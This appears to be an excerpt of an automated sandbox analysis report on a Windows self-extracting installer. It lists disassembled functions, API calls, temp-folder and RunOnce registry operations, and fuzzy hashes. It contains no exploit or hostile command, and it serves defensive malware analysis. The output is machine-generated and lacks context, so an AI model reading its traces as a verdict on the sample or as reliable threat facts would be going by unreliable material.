                                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                            • Opcode ID: 0c7e795869b0bb7ecb56907307ad06398bcba12b6dde4866347378970c4af644
                                                                                                                                                                                                                                                            • Instruction ID: b9dcb90f1454ea5b6ae9b1308b8e7babef6d09bfcb188fcf6e38a5e3b4ef499d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c7e795869b0bb7ecb56907307ad06398bcba12b6dde4866347378970c4af644
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8311C175902639BB9B30DB91AC1DDFBBF7EEF017A1F104155B808F2100D6704E05DAA0
                                                                                                                                                                                                                                                            Function 00626A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 600 626a60-626a91 call 627155 call 627208 GetStartupInfoW 606 626a93-626aa2 600->606 607 626aa4-626aa6 606->607 608 626abc-626abe 606->608 610 626aa8-626aad 607->610 611 626aaf-626aba Sleep 607->611 609 626abf-626ac5 608->609 612 626ad1-626ad7 609->612 613 626ac7-626acf _amsg_exit 609->613 610->609 611->606 615 626b05 612->615 616 626ad9-626af2 call 626c3f 612->616 614 626b0b-626b11 613->614 618 626b13-626b24 _initterm 614->618 619 626b2e-626b30 614->619 615->614 616->614 623 626af4-626b00 616->623 618->619 621 626b32-626b39 619->621 622 626b3b-626b42 619->622 621->622 624 626b67-626b71 622->624 625 626b44-626b51 call 627060 622->625 627 626c39-626c3e call 62724d 623->627 626 626b74-626b79 624->626 625->624 633 626b53-626b65 625->633 629 626bc5-626bc8 626->629 630 626b7b-626b7d 626->630 634 626bd6-626be3 _ismbblead 629->634 635 626bca-626bd3 629->635 636 626b94-626b98 630->636 637 626b7f-626b81 630->637 633->624 639 626be5-626be6 634->639 640 626be9-626bed 634->640 635->634 642 626ba0-626ba2 636->642 643 626b9a-626b9e 636->643 637->629 641 626b83-626b85 637->641 639->640 640->626 641->636 645 626b87-626b8a 641->645 646 626ba3-626bbc call 622bfb 642->646 643->646 645->636 647 626b8c-626b92 645->647 650 626c1e-626c25 646->650 651 626bbe-626bbf exit 646->651 647->641 652 626c32 650->652 653 626c27-626c2d _cexit 650->653 651->629 652->627 653->652
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00627155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00627182
                                                                                                                                                                                                                                                              • Part of subcall function 00627155: GetCurrentProcessId.KERNEL32 ref: 00627191
                                                                                                                                                                                                                                                              • Part of subcall function 00627155: GetCurrentThreadId.KERNEL32 ref: 0062719A
                                                                                                                                                                                                                                                              • Part of subcall function 00627155: GetTickCount.KERNEL32 ref: 006271A3
                                                                                                                                                                                                                                                              • Part of subcall function 00627155: QueryPerformanceCounter.KERNEL32(?), ref: 006271B8
                                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,006272B8,00000058), ref: 00626A7F
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00626AB4
                                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00626AC9
                                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00626B1D
                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00626B49
                                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00626BBF
                                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00626BDA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                                            • Opcode ID: 410b7361b665b1d03fc1316fd1de4178bd0aa271de2d992efa4c105b5200450f
                                                                                                                                                                                                                                                            • Instruction ID: d318dac113baa8599d3eab4e60b256985e002c52e1e3692d3704646aa1ba24bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 410b7361b665b1d03fc1316fd1de4178bd0aa271de2d992efa4c105b5200450f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441C13190AE35CFDB219B64FC057AA77A3BB44722F24501AF841E72D0CB7449528F91
                                                                                                                                                                                                                                                            Function 006258C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 654 6258c8-6258d5 655 6258d8-6258dd 654->655 655->655 656 6258df-6258f1 LocalAlloc 655->656 657 6258f3-625901 call 6244b9 656->657 658 625919-625959 call 621680 call 62658a CreateFileA LocalFree 656->658 661 625906-625910 call 626285 657->661 658->661 667 62595b-62596c CloseHandle GetFileAttributesA 658->667 668 625912-625918 661->668 667->661 669 62596e-625970 667->669 669->661 670 625972-62597b 669->670 670->668
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00625534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 006258E7
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00625534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00625943
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00625534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0062594D
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00625534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0062595C
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00625534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00625963
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                            • API String ID: 747627703-3033780695
                                                                                                                                                                                                                                                            • Opcode ID: 29409786c3cebdb6cc0a73007a22cb94e0a81da048c27d5e60dd9dcf423e4455
                                                                                                                                                                                                                                                            • Instruction ID: 072105b2a2d9f7a3c0143a5a8a19a48f1f2573513842af1ce0f1609e0c7697ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29409786c3cebdb6cc0a73007a22cb94e0a81da048c27d5e60dd9dcf423e4455
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C112931A00E306BC7305FB9BC0DB9B7E9FDF46370F104619B50AD3291CAB088468AA4
                                                                                                                                                                                                                                                            Function 00623FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00624033
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00624049
                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 0062405C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0062409C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 006240A8
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 006240DC
                                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 006240E9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                                            • Opcode ID: c34d0dd91e288f31ecb5c3a2d782a111780bd52ad49821e754feea997973837e
                                                                                                                                                                                                                                                            • Instruction ID: 4ce37d800d70681922d6626ba089035dfc889ac810d7f7336dd7dd72470f8f5f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c34d0dd91e288f31ecb5c3a2d782a111780bd52ad49821e754feea997973837e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6931B131641A28ABEB309B65EC4DFEB777EEB94710F1051A9F905D22A0CA704D92CF25
                                                                                                                                                                                                                                                            Function 006251E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00622F4D,?,00000002,00000000), ref: 00625201
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00625250
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                              • Part of subcall function 00626285: GetLastError.KERNEL32(00625BBC), ref: 00626285
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                            • Opcode ID: 41537dcc13d98df546a2c2bf6c25376b59c48b451599b036a5c37cbbbbe1199b
                                                                                                                                                                                                                                                            • Instruction ID: bbd0356a2801ee41a548cc610de24b56c9b6278be36f590c01ec0d72ea3a63f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41537dcc13d98df546a2c2bf6c25376b59c48b451599b036a5c37cbbbbe1199b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A119671602E21EBD3746BB17C4AB3B659FDBCA394F10442DB647D92D0DAB98C024939
                                                                                                                                                                                                                                                            Function 00623A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00622F64,?,00000002,00000000), ref: 00623A5D
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00623AB3
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                              • Part of subcall function 00626285: GetLastError.KERNEL32(00625BBC), ref: 00626285
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00623AD0
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00623B13
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: FindResourceA.KERNEL32(00620000,000007D6,00000005), ref: 0062652A
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: LoadResource.KERNEL32(00620000,00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00626538
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: DialogBoxIndirectParamA.USER32(00620000,00000000,00000547,006219E0,00000000), ref: 00626557
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: FreeResource.KERNEL32(00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00626560
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00623100,00000000,00000000), ref: 00623AF4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                            • Opcode ID: 0e8d1db809458ae916564d51c09418db3b1d9ef42da5672abc3765d36f8fe7b2
                                                                                                                                                                                                                                                            • Instruction ID: 5672be48e1d41e3abf9fd424cc9863c2c7823ed50eb4926398e2fa8150830838
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e8d1db809458ae916564d51c09418db3b1d9ef42da5672abc3765d36f8fe7b2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3411A530601E31AFD7706F62BC09E1739ABDFD6740B10583EB545D66A1DB7988128E35
                                                                                                                                                                                                                                                            Function 006252B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(030A45D0,00000080,?,00000000), ref: 006252F2
                                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(030A45D0), ref: 006252FA
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(030A45D0,?,00000000), ref: 00625305
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(030A45D0), ref: 0062530C
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(006211FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00625363
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00625334
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                            • API String ID: 2833751637-3647970563
                                                                                                                                                                                                                                                            • Opcode ID: da1a6e9b6a1881eae19d9bd6b50ff8a5ba4787390adf4e0eaf2a49684ee028c7
                                                                                                                                                                                                                                                            • Instruction ID: 3b611d3d542f99014db5b32f8b61c2492290525db185bed89232fd67c71cbf67
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da1a6e9b6a1881eae19d9bd6b50ff8a5ba4787390adf4e0eaf2a49684ee028c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9421DE31902E24DFDB30EB20FD0ABA937A3AB54794F042119E882976A4DFB45D86CF55
                                                                                                                                                                                                                                                            Function 00621FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0062538C,?,?,0062538C), ref: 00622005
                                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(0062538C,wextract_cleanup1,?,?,0062538C), ref: 00622017
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(0062538C,?,?,0062538C), ref: 00622020
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                                            • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                                            • Opcode ID: 924d9f6f2e8d0e88d50b056392fd9c4760e0ed813817dc2707aee336f7fb24ad
                                                                                                                                                                                                                                                            • Instruction ID: 022ec5865a5933a104b17db55727c902e747c0ce96e689c6ea4c9f6cc96ddaf4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 924d9f6f2e8d0e88d50b056392fd9c4760e0ed813817dc2707aee336f7fb24ad
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9E04F70951B28BFD7318FD0FC0AF997B2BEB00744F100294B904A1160EBA15E15DA05
                                                                                                                                                                                                                                                            Function 00624169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,006230B4), ref: 00624189
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,006230B4), ref: 006241E7
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                            • Opcode ID: b4bedfa8a80a2e13a71ae0731aa1c95ad459914d0506e67bcf00327f8a4920f8
                                                                                                                                                                                                                                                            • Instruction ID: 97f59a663139545e74755fe6d0f91743be84fd7554a0a97b2dd1ba753402907a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4bedfa8a80a2e13a71ae0731aa1c95ad459914d0506e67bcf00327f8a4920f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3701A2B1700E347BE32426656C89F7B258FDB95795F014029B706D52809DA8CC124979
